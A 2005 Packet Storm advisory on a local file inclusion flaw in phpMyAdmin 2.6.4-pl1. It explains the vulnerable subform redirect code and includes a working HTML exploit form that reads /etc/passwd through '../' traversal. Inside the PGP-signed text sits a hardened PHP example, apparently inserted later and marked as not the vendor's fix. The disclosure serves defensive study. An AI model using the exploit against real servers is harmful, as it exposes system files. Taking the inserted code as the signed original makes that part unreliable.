phpMyAdminLocal.txt

2005-10-11T00:00:00
ID PACKETSTORM:40569
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2005-10-11T00:00:00

Description

                                        
`
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[phpMyAdmin Local file inclusion 2.6.4-pl1]  
  
Author: Maksymilian Arciemowicz ( cXIb8O3 ).18  
Date: 10.10.2005  
from SECURITYREASON.COM  
  
- --- 0.Description ---  
phpMyAdmin 2.6.4 is a tool written in PHP intended to  
handle the administration of MySQL over the Web.  
Currently it can create and drop databases,  
create/drop/alter tables, delete/edit/add fields,  
execute any SQL statement, manage keys on fields.  
blablabla...  
phpMyAdmin is a very dangerous script.  
  
- --- 1. Local file inclusion (Critical) ---  
File: ./libraries/grab_globals.lib.php  
  
This file is included by many files, for example index.php:  
  
- -index.php--  
<?php  
/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */  
// vim: expandtab sw=4 ts=4 sts=4:  
  
/**  
* Gets core libraries and defines some variables  
*/  
require_once('./libraries/grab_globals.lib.php');  
require_once('./libraries/common.lib.php');  
...  
- -index.php--  
  
OK, so in ./libraries/grab_globals.lib.php we have:  
  
- -101-104-grab_globals.lib.php---------  
if ( ! empty( $__redirect ) ) {  
    require('./' . $__redirect);  
    exit();  
} // end if ( ! empty( $__redirect ) )  
- -101-104-grab_globals.lib.php---------  
  
But before that we have:  
  
- -53-67-grab_globals.lib.php-----------  
// check if a subform is submitted  
$__redirect = NULL;  
if ( isset( $_POST['usesubform'] ) ) {  
    // if a subform is present and should be used  
    // the rest of the form is deprecated  
    $subform_id = key( $_POST['usesubform'] );  
    $subform = $_POST['subform'][$subform_id];  
    $_POST = $subform;  
    if ( isset( $_POST['redirect'] )  
        && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {  
        $__redirect = $_POST['redirect'];  
        unset( $_POST['redirect'] );  
    } // end if ( isset( $_POST['redirect'] ) )  
} // end if ( isset( $_POST['usesubform'] ) )  
// end check if a subform is submitted  
- -53-67-grab_globals.lib.php-----------  
  
If the variable $_POST['usesubform'] exists and is an array, we can create new variables in $_POST (for example $_POST['redirect']).  
  
$subform = $_POST['subform'][$subform_id];  
$_POST = $subform;  
  
Here the array $_POST is replaced by the array $_POST['subform'][1], so that  
$_POST['redirect'] = $_POST['subform'][1]['redirect']  
  
and we have local file inclusion.  
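
A hardened form of the subform redirect handling quoted above, shown as an added example that is not phpMyAdmin's code or its actual fix. The function name, the allowlist and `example_form.php` are assumptions made for illustration; the traversal value is the one quoted in this advisory.

```php
<?php
// Added example, not phpMyAdmin code. resolve_subform_redirect(), $baseDir
// and $allowed are hypothetical names chosen for this sketch.
function resolve_subform_redirect(array $post, string $baseDir, array $allowed): ?string
{
    $use = $post['usesubform'] ?? null;
    if (!is_array($use) || $use === []) {
        return null;                       // no subform submitted
    }
    $subform = $post['subform'][key($use)] ?? null;
    $target  = is_array($subform) ? ($subform['redirect'] ?? null) : null;
    if (!is_string($target)) {
        return null;
    }
    // 1. Only a bare script name from a fixed list may be required, so
    //    "../" sequences and absolute paths never reach require().
    if ($target !== basename($target) || !in_array($target, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: the resolved path must stay inside $baseDir
    //    (realpath() also resolves symlinks).
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $real   = realpath($base . DIRECTORY_SEPARATOR . $target);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo: a scratch directory stands in for the application root.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'subform_demo_' . getmypid();
mkdir($root);
touch($root . DIRECTORY_SEPARATOR . 'example_form.php');
$samples = [
    'listed'    => 'example_form.php',
    'traversal' => '../../../../../../../etc/passwd', // value quoted in the advisory
    'unlisted'  => 'other.php',
];
foreach ($samples as $label => $redirect) {
    $post = ['usesubform' => [1 => '1'], 'subform' => [1 => ['redirect' => $redirect]]];
    $path = resolve_subform_redirect($post, $root, ['example_form.php']);
    printf("%-10s %s\n", $label, $path === null ? 'rejected' : 'accepted');
}
unlink($root . DIRECTORY_SEPARATOR . 'example_form.php');
rmdir($root);
```

The original check only compares the value against `basename( $_SERVER['PHP_SELF'] )`, which rejects one name and accepts every other path; the allowlist inverts that to accept only known names.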
  
Example response in html:  
  
- -Exploit---  
<CENTER>  
<A HREF="http://www.securityreason.com"><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P>  
<FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data">  
<input TYPE="hidden" name="usesubform[1]" value="1">  
<input TYPE="hidden" name="usesubform[2]" value="1">  
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>  
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">  
<input TYPE="submit" value="Exploit">  
</FORM>  
- -Exploit---  
  
Exploit:  
http://securityreason.com/achievement_exploitalert/2  
  
- --- 2. Greets ---  
  
sp3x  
  
- --- 3.Contact ---  
Author: Maksymilian Arciemowicz < cXIb8O3 >  
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com  
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
WWW: http://securityreason.com  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (FreeBSD)  
  
iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T  
cvqCRiRlK9XrQGvV3sYxzXQ=  
=yoDY  
-----END PGP SIGNATURE-----  
  
`